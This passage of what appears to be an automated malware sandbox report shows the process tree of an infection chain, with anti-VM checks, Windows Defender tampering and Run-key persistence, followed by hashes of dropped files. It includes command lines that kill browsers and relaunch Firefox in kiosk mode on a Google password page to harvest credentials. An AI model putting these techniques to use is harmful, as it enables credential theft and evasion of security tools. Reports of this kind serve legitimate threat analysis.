                                                                                                                                                                                                                                      Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                                                                                      PID:3248
                                                                                                                                                                                                                                    • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                      find ":"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                        PID:3252
                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                        Timeout /T 1 /Nobreak
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                        PID:2180
                                                                                                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                        Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                                                                        PID:580
                                                                                                                                                                                                                                      • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                        find ":"
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:2688
                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                          Timeout /T 1 /Nobreak
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:1320
                                                                                                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                            Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:3556
                                                                                                                                                                                                                                            • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                              find ":"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:3564
                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                Timeout /T 1 /Nobreak
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                PID:2248
                                                                                                                                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                                                PID:3884
                                                                                                                                                                                                                                              • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                find ":"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:3864
                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                  Timeout /T 1 /Nobreak
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                  PID:3972
                                                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                  Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                                                  PID:3976
                                                                                                                                                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                  find ":"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:3944
                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                    Timeout /T 1 /Nobreak
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:4040
                                                                                                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                      Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:4060
                                                                                                                                                                                                                                                      • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                        find ":"
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                          PID:2828
                                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                          Timeout /T 1 /Nobreak
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:3276
                                                                                                                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                            Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                                                                                            PID:2784
                                                                                                                                                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                            find ":"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                              PID:3264
                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                              Timeout /T 1 /Nobreak
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:3364
                                                                                                                                                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                PID:3404
                                                                                                                                                                                                                                                              • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                                find ":"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:3604
                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                  Timeout /T 1 /Nobreak
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                  PID:1688
                                                                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                  Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                    PID:3884
                                                                                                                                                                                                                                                                  • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                                    find ":"
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                      PID:3608
                                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                      Timeout /T 1 /Nobreak
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                      PID:2732
                                                                                                                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                      Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                      PID:3980
                                                                                                                                                                                                                                                                    • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                                      find ":"
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                        PID:4048
                                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                        Timeout /T 1 /Nobreak
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                        PID:4028
                                                                                                                                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                        Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                        PID:4024
                                                                                                                                                                                                                                                                      • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                                        find ":"
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:2548
                                                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                          Timeout /T 1 /Nobreak
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                            PID:3164
                                                                                                                                                                                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                            Tasklist /fi "PID eq 2880"
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                            PID:3256
                                                                                                                                                                                                                                                                          • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                                            find ":"
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                              PID:3380
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                        PID:2964
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          PID:2308
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                            PID:2844
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        PID:1600
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                        PID:2736
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 1200
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                          PID:2764
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                        PID:1972
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                        PID:2004
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                          taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                          PID:396
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                          taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                          PID:772
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                          taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                          PID:908
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                          taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                          PID:2704
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                          taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                          PID:2776
                                                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:2956
                                                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                              PID:300
                                                                                                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.0.1337352138\1171607553" -parentBuildID 20221007134813 -prefsHandle 1244 -prefMapHandle 1196 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd1ffbe0-fde8-41f7-b9f5-a2e143d89b2a} 300 "\\.\pipe\gecko-crash-server-pipe.300" 1324 106dbe58 gpu
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                  PID:1660
                                                                                                                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.1.971295469\132527329" -parentBuildID 20221007134813 -prefsHandle 1540 -prefMapHandle 1536 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c80145c5-498f-4946-8dad-2f2b8108cd90} 300 "\\.\pipe\gecko-crash-server-pipe.300" 1552 f3eb258 socket
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                    PID:2472
                                                                                                                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.2.1791177149\199354410" -childID 1 -isForBrowser -prefsHandle 2208 -prefMapHandle 2204 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a58b41a8-2a8b-4824-ab7a-c6cedf00c3b9} 300 "\\.\pipe\gecko-crash-server-pipe.300" 2220 175d9258 tab
                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                      PID:2320
                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.3.1120652361\535779563" -childID 2 -isForBrowser -prefsHandle 2704 -prefMapHandle 2640 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5a22e55-3f41-49f6-9837-3c5a9ea8369b} 300 "\\.\pipe\gecko-crash-server-pipe.300" 2776 1d70a658 tab
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                        PID:2892
                                                                                                                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.4.1509203630\1168830996" -childID 3 -isForBrowser -prefsHandle 3660 -prefMapHandle 3768 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {761025cf-1ac0-4ad9-91e7-7c0357446cb6} 300 "\\.\pipe\gecko-crash-server-pipe.300" 3796 e69758 tab
                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                          PID:1640
                                                                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.5.1702620004\829867254" -childID 4 -isForBrowser -prefsHandle 3904 -prefMapHandle 3908 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5a7969e-1401-43b1-b1cd-37389839b617} 300 "\\.\pipe\gecko-crash-server-pipe.300" 3892 1b84d658 tab
                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                            PID:692
                                                                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="300.6.705501292\1687976917" -childID 5 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {90f30b2a-17ac-4871-b956-62a0716fd10e} 300 "\\.\pipe\gecko-crash-server-pipe.300" 4052 1b84dc58 tab
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                              PID:2912
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe"
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                                                                                                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                                                                                                                                                        • Modifies Windows Defender TamperProtection settings
                                                                                                                                                                                                                                                                                        • Modifies Windows Defender notification settings
                                                                                                                                                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                                        • Windows security modification
                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        PID:3640
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe"
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        PID:3632
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 1212
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          PID:3416
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                        PID:3240
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe"
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:2800

                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    71KB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    83142242e97b8953c386f988aa694e4a

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    833ed12fc15b356136dcdd27c61a50f59c5c7d50

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp

                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    23KB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    ae7c305a3c228d3cc12291c8adf2bfc4

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    d88fb4c63a5c1eadc05c53a5f4fc78d463c482ab

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    6364157ebedd296ceba1aebda06ede3524fed90fec7551cc656d92a7d578e79d

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    b54eb3d473651257faecbe0a28be7472b280b780d13aff61205c587ced20654580cc9ece95f3c2b4b71cd31b9e8d8083f8840bdb642f2e4ef8aac9e3f10765b7

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    15KB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    96c542dec016d9ec1ecc4dddfcbaac66

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    6199f7648bb744efa58acf7b96fee85d938389e4

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    5b3ed060facb9d57d8d0539084686870

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    9cae8c44e44605d02902c29519ea4700b4906c76

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe

                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    15.0MB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    35a4dfb5f0308d20b1e5bf26e0a70509

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    0c72b35b74dadbce4a95c034968913de271aae06

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    40d3baeb6df3e2cd4eed207e773b21989b86ef547de12a748529c2b559025339

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    51b8bf5583a256015daaa8caa9c9868c792ef4a1157b89a6880b365c4c5a1c7416abc2b1fcdde9d1d5d9bb7aaa1c617d5b34124a582ec042ac5a2afa064c60d9

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe

                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    361KB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    2bb133c52b30e2b6b3608fdc5e7d7a22

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    fcb19512b31d9ece1bbe637fe18f8caf257f0a00

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630

                                                                                                                                                                                                                                                                                    SHA512

